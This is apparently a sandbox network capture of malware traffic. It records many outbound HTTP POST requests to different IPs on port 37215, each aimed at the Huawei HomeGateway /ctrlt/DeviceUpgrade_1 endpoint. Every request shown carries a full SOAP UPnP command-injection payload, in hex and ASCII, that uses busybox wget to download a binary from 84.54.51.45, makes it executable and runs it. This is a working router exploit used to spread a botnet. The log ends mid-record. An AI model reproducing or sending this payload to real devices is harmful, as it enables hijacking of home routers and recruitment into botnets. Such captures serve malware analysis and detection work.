                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1338192.168.2.1560372197.87.203.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731115103 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1339192.168.2.1555096197.252.53.24937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731116056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1340192.168.2.1553060197.249.76.3237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731142998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1341192.168.2.1538408197.63.56.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731144905 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1342192.168.2.1552714197.91.239.9337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731175900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1343192.168.2.1548138197.61.84.18737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731177092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1344192.168.2.1558702197.244.212.18537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731189966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1345192.168.2.1554338197.33.145.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731246948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1346192.168.2.1534772197.73.128.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731246948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1347192.168.2.1553646197.148.82.22937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731264114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 